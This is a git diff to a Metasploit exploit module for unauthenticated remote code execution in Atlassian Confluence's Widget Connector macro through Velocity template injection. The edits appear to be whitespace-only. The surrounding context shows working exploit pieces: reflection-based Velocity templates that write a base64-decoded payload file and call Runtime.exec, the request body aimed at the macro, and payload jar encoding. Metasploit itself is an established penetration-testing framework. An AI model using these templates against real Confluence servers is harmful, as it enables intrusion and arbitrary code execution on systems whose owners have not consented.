diff --git a/modules/exploits/multi/http/confluence_widget_connector.rb b/modules/exploits/multi/http/confluence_widget_connector.rb
index f101ff1073..75e17cdcb5 100644
--- a/modules/exploits/multi/http/confluence_widget_connector.rb
+++ b/modules/exploits/multi/http/confluence_widget_connector.rb
@@ -16,13 +16,13 @@ class MetasploitModule < Msf::Exploit::Remote
 'Name' => "Atlassian Confluence Widget Connector Macro Velocity Template Injection",
 'Description' => %q{
 Widget Connector Macro is part of Atlassian Confluence Server and Data Center that
- allows embed online videos, slideshows, photostreams and more directly into page.
- A _template parameter can be used to inject remote Java code into a Velocity template,
- and gain code execution. Authentication is unrequired to exploit this vulnerability.
- By default, Java payload will be used because it is cross-platform, but you can also
+ allows embed online videos, slideshows, photostreams and more directly into page.
+ A _template parameter can be used to inject remote Java code into a Velocity template,
+ and gain code execution. Authentication is unrequired to exploit this vulnerability.
+ By default, Java payload will be used because it is cross-platform, but you can also
 specify which native payload you want (Linux or Windows).

- Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version
+ Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version
 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.

 This vulnerability was originally discovered by Daniil Dmitriev
@@ -83,9 +83,9 @@ class MetasploitModule < Msf::Exploit::Remote
 when /javaprop\.vm$/
 conn.put(wrap(get_javaprop_vm()))
 when /upload\.vm$/
- conn.put(wrap(get_upload_vm()))
+ conn.put(wrap(get_upload_vm()))
 when /exec\.vm$/
- conn.put(wrap(get_exec_vm()))
+ conn.put(wrap(get_exec_vm()))
 else
 conn.put(wrap(get_dummy_vm()))
 end
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
 $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))
 EOF
 )
- end
+ end

 # Returns a command execution template.
 #
@@ -134,7 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote
 $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor()
 EOF
 )
- end
+ end

 # Returns checking template.
 #
@@ -166,9 +166,9 @@ class MetasploitModule < Msf::Exploit::Remote
 <<~EOF
 EOF
 )
- end
+ end

- # Checks the vulnerability.
+ # Checks the vulnerability.
 #
 # @return [Array] Check code
 def check
@@ -203,10 +203,10 @@ class MetasploitModule < Msf::Exploit::Remote
 'uri' => uri,
 'headers' => {
 'Accept' => '*/*',
- 'Origin' => full_uri(vhost_uri: true)
+ 'Origin' => full_uri(vhost_uri: true)
 },
 'ctype' => 'application/json; charset=UTF-8',
- 'data' => {
+ 'data' => {
 'contentId' => '1',
 'macro' => {
 'name' => 'widget',
@@ -332,7 +332,7 @@ class MetasploitModule < Msf::Exploit::Remote
 fail_with(Failure::Unknown, 'Unable to get the temp path.')
 end

- @fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar")
+ @fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar")
 @b64 = Rex::Text.encode_base64(payload.encoded_jar)
 @command = ''